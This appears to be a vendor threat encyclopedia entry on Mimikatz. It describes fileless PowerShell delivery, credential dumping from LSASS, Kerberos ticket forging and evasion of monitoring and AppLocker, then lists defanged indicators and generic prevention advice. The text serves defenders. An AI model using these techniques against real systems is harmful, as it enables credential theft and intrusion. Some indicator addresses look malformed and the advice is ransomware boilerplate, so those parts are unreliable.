Threat behavior
Installation
A special PowerShell script (Invoke-Mimikatz.ps1) allows PowerShell to perform remote fileless execution of this threat. In essence, fileless execution enables loading of a binary into process space without touching the hard disk. When a fileless binary is loaded directly into memory, it remains invisible for file scanning antivirus solutions.
In a typical credential harvesting scenario, a malicious hacker can run a PowerShell command to trick the victim's device to download the script from a malicious server. Next, the downloaded script uses reflective DLL injection to load and run the threat remotely without storing any files on the disk of the compromised device. As a result of this, the malicious hacker can remotely leverage the threat to execute malicious activity like stealing credentials, certificates, and collecting data from the compromised host.
Payload
This threat can:
- Recover and export Windows passwords in clear-text by injecting a DLL into lsass.exe
- Export security certificates
- Fileless execution through PowerShell
- Inject DLLs into running processes
- List running system and user processes
- Obtain all process tokens
- Impersonate a token
- Get a list with loaded kernel drivers
- Get a table with all service calls and corresponding kernel modules names
- Retrieve data about all callback modules that receive notifications for processes, images, threads, registry changes, objects, and file changes
- BSOD the machine
- Modify privileges
- Bypass some Group Policy settings
- Disable some security and event monitoring services
- Bypass Microsoft AppLocker / Software Restriction Polices
- Gather critical data for security and instrumentation software running on the host.
Recover and export Windows credentials
This threat can dump credentials from LSASS (Windows Local Security Account database) including:
- NT LAN Manager (NTLM) password hashes
- LAN Manager password hashes
- Kerberos password, ekeys, tickets, and PIN
- TsPkg (password)
- WDigest (clear-text password)
- LiveSSP (clear-text password)
- SSP (clear-text password)
- DPAPI hashes and keys
Creates following processes:
- "C:\Users\<USER>\AppData\Local\Temp\mimikatz.exe"
- %SAMPLEPATH%\mimikatz.exe
- C:\Windows\System32\wuapihost.exe
- C:\Windows\System32\UI0Detect.exe
- C:\Users\user\Desktop\software.exe
Mimikatz communicates to the following hosts:
- a83f[:]8110:0:0:d8ff:ffff:766b:e00
- a83f[:]8110:0:0:d8ff:ffff:766b:e00
- a83f[:]8110:0:0:700:700:2800:4000
- a83f[:]8110:cce1:d301:10:0:0:0
- a83f[:]8110:0:0:1b00:100:2800:0
- 192[.]229.211.108:80
- a83f[:]8110:0:0:1b02:0:0:0
- a83f[:]8110:0:0:2000:0:0:0
- a83f[:]8110:0:0:f084:e4d8:7b02:0
- a83f[:]8110:0:0:4c8e:21:0:0
- a83f[:]8110:6f77:2054:4350:2049:6e05:4600
- a83f[:]8110:0:0:64ca:1f00:0:0
- a83f[:]8110:0:0:23f2:a224:8094:db01
- a83f[:]8110:d3a4:48ff:d5a5:46ff:d5a5:46ff
- 218[.]85.157.99:53
- fp2e7a[.]wpc.2be4.phicdn[.]net
- fp2e7a[.]wpc.phicdn[.]net
This malware also accesses or downloads from the following URLs:
- hxxp://repository.certum[.]pl/ctnca[.]cer
It can also:
- Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
- Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
- Export certificates and keys
- Dump cached credentials
- Stop event monitoring
- Patch terminal server
- Bypass basic group policy objects
Prevention
Guidance for end users
For more tips on how to keep your device safe, go to the Microsoft security help & learning portal.
- Do not open files from unknown sources
- Do not click links from unknown sources
To learn more about preventing trojans or other malware from affecting individual devices, read about preventing malware infection.
Guidance for enterprise administrators
Ransomware more than often attacks enterprises than individuals. Following the below mitigation steps can help prevent ransomware attacks:
- Keep backups so you can recover data affected by ransomware and destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.
- Harden internet-facing assets and ensure they have the latest security updates. Use threat and vulnerability management to audit these assets regularly for vulnerabilities, misconfigurations, and suspicious activity.
- Secure Remote Desktop Gateway using solutions like Azure Multi-Factor Authentication (MFA). If you don’t have an MFA gateway, enable network-level authentication (NLA).
- Monitor for brute-force attempts. Check excessive failed authentication attempts (Windows security event ID 4625).
- Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
- Turn on attack surface reduction rules, including rules that block ransomware activity and other activities associated with human adversaries. To assess the impact of these rules, deploy them in audit mode.
- Utilize the Microsoft Defender Firewall and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.
- Turn on tamper protection features to prevent attackers from stopping security services.
- Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Office 365 ATP customers should ensure that Safe Links protection is enabled for users with Zero-hour Auto Purge (ZAP) to remove emails when a URL gets weaponized post-delivery.
- Educate end users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
